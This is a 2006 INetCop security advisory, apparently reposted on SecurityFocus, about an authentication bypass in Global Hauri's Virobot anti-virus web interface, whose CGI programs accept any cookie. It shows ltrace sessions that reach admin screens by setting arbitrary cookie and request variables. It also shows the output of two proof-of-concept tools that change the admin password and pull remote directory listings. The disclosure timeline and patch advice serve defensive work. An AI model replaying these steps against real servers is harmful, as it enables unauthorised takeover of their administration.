[INetCop Security Advisory] Global Hauri Virobot cookie exploit Feb 22 2006 01:58AM
dong-hun you (xploit hackermail com)

INetCop Security Advisory #2006-0x82-028

* Title: Global Hauri Virobot cookie exploit

0x01. Description

Virobot Unix/Linux Server is anti virus program that develop in Global Hauri.
(Product in Unix of SUN Sparc, HP, IBM base and RedHat Linux.)
So that user examines and treats server's virus first,
should login connect to Virobot exclusive use web server.
Web server is being based on apache,
i provide web service through CGI programs that is embodied inside.

Problem of relevant product happens by many common gateway interface web program
that don't confirm user state through produced cookie.
This is fatal authentication vulnerability, and as a result,
malicious hacker can acquire user id and password,
and server use is possible without login.

test: --

[root@Intel-x86-platform cgi-bin]# pwd
[root@Intel-x86-platform cgi-bin]# ./filescan

<font size=2>You need to authenticate.</font>
[root@Intel-x86-platform cgi-bin]#
[root@Intel-x86-platform cgi-bin]# ltrace ./filescan
__libc_start_main(0x08048c20, 1, 0xbffffbe4, 0x080488b4, 0x0804c3cc <unfinished ...>
__register_frame_info(0x0804f010, 0x0804f188, 0xbffffba4, 0x080488d9, 0x4010748c) = 0x40107fc0
printf("Content-type:text/html\n\n") = 24
getenv("REMOTE_ADDR") = NULL
memset(0xbffff729, '\000', 511) = 0xbffff729
memset(0xbffff6e9, '\000', 63) = 0xbffff6e9
uname(0xbfffd558) = 0
gethostbyname("Intel-x86-platform") = 0x40109f04
inet_ntoa(0x0100007f) = ""
strncpy(0xbfffd4d8, "", 127) = 0xbfffd4d8
getenv("HTTP_COOKIE") = NULL // HTTP_COOKIE variable value need.
atoi(0x0804c4f6, 0x0804c4f6, 0, 0xbffffb5c, 0x0804bf1a) = 3
strcmp("#COM-0003;", "#FSC-0003;") = -3
strcmp("#COM-0003;", "#COM-0003;") = 0
printf("<font size=2>%s</font>\n", "You need to authenticate.") = 46
exit(1) = <void>
__deregister_frame_info(0x0804f010, 0xbffffb48, 0x0804c3e1, 0x4010748c, 0xbffffb5c) = 0x0804f188
+++ exited (status 1) +++
[root@Intel-x86-platform cgi-bin]#
[root@Intel-x86-platform cgi-bin]# export HTTP_COOKIE=test // HTTP_COOKIE variable value establishment.
[root@Intel-x86-platform cgi-bin]# ltrace ./filescan
getenv("REMOTE_ADDR") = NULL
memset(0xbffff709, '\000', 511) = 0xbffff709
memset(0xbffff6c9, '\000', 63) = 0xbffff6c9
uname(0xbfffd538) = 0
gethostbyname("Intel-x86-platform") = 0x40109f04
inet_ntoa(0x0100007f) = ""
strncpy(0xbfffd4b8, "", 127) = 0xbfffd4b8
getenv("HTTP_COOKIE") = "test"
getenv("HTTP_COOKIE") = "test"
strncmp("test", "ViRobot_ID", 10) = 30
strncmp("test", "ViRobot_PASS", 10) = 30
// Can know that ViRbot_ID and ViRobot_PASS are used by Cookie value.
... // It's executed continuously though cookie value differs.
getenv("REQUEST_METHOD") = NULL // REQUEST_METHOD variable value need.
strcmp(NULL, "POST" <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
[root@Intel-x86-platform cgi-bin]#
[root@Intel-x86-platform cgi-bin]# export REQUEST_METHOD=GET // REQUEST_METHOD variable value establishment.
[root@Intel-x86-platform cgi-bin]# ./filescan | more

<title>ViRobot Linux Server Ver 2.0</title>
<select name=dirs class=
'width-full' size=8 onchange='javascript:document.dir_form.submit()'>
<OPTION value="/.">.</OP
<OPTION value="/..">..</
<OPTION value="/etc">etc
<OPTION value="/boot">bo
<form name=web_vrscan method=post action=webvrsc
an target=new>
<td align=right valign=top>
<input type=image src='/images/button_sc
an.gif' border=0><input type=hidden name=web>
[root@Intel-x86-platform cgi-bin]#

With upside, result that require unrelated cookie value,
I could get easily screen information that administrator utilizes after login.


0x02. Vulnerable Packages

Vendor site:
Global HAURI Inc. - http://www.globalhauri.com/ (US & Canada)
HAURI ASIA Pte Ltd. - http://www.hauri.com.sg/ (Singapore)
HAURI JAPAN Inc. - http://www.hauri.co.jp/ (Japan)
China Blue Star Hauri Technology Co., Ltd. - http://www.hauri.com.cn/ (China)
HAURI Latinoamerica S.A. - http://www.haurilatin.com/ (Latin/Mexico)
Hauri do Brazil - http://www.haurilatin.com/ (Latin/Brazil)
Hauri Europe GmbH - http://www.hauri-europe.com/ (Europe)
HAURI Inc. - http://www.hauri.co.kr/ (Korea)

Virobot Linux Server
+Turbo 6x/7x, Laser 5/6x/7x, Miracle 2x, Redhat 6x/7x
Virobot Unix Server

Disclosure Timeline:
2003-08.??: Vulnerabilities found.
2003-08.??: 1st vendor contact. (didn't responded)
2005-09.30: 2nd vendor contact. (didn't responded)
2005-10.03: 3rd vendor contact. (didn't responded)
2005-10.08: Deleted free download page in vendor (Ooops).
2006-02.17: 4th verdon contact. (didn't responded)
2006-02.22: Public disclosure.

0x03. Exploit

We have two `Proof Of Concept' codes about bugs.

#1. Virobot web administrator password change exploit:

[root@Intel-x86-platform virobot]# head 0x82-viropass.c
** 0x82-viropass - Virobot password change exploit (ver2003)
** Our INetCop Security Team found this bug for the first time in 2003.
** At that time, vender Global Hauri was no any reaction.
** Announce unfortunately now.. (This bug that sleep during 2 years)
** exploit result:
[root@Intel-x86-platform virobot]#
[root@Intel-x86-platform virobot]# ./0x82-viropass localhost 8080 x82 hax0r

0x82-viropass - Virobot password change exploit (ver2003)

** This exploit code is may change your virobot server **
** administrator id and password. **

[1] Set socket.
[2] Send code.
[*] Ok, modify admin information. (id: x82, passwd: hax0r)
[*] exploit successfully.
[*] Antivirus lose!

[root@Intel-x86-platform virobot]#

#2. Virobot remote directory file access exploit:

[root@Intel-x86-platform virobot]# head 0x82-virofuk.c
** Virobot cookie bug remote exploit (v0.2) [Proof of Concept]
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc (at) hotmail (dot) com [email concealed]>.
** My World: http://x82.inetcop.org

[root@Intel-x86-platform virobot]#
[root@Intel-x86-platform virobot]# ./0x82-virofuk localhost 8080

Virobot cookie bug remote exploit [Proof of Concept]

[1] Set socket.
[2] Send code.
[3] Take and is storing substance.
[*] Save file name: result.htm
[*] Please wait for a moment ... [OK]
[*] Read result.htm file contents.

[root@Intel-x86-platform virobot]# ls result.htm
[root@Intel-x86-platform virobot]#

Hacker can attempt remote attack through this fatal problems.

0x04. Patch

Problem happens by all CGI programs that can use without cookie information value.
So that can inspect cookie value that user always has must add examining function or, module.
Formally, before patch comes out, using firewall or iptables by temporary expedient,
can establish so that can connect administrator's IP for relevant Web page.

Thank you.

P.S: Sorry, for my poor english.

By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,

INetCop Security Home: http://www.inetcop.org
My World: http://x82.inetcop.org

GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y

Get your free email from http://www.hackermail.com

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus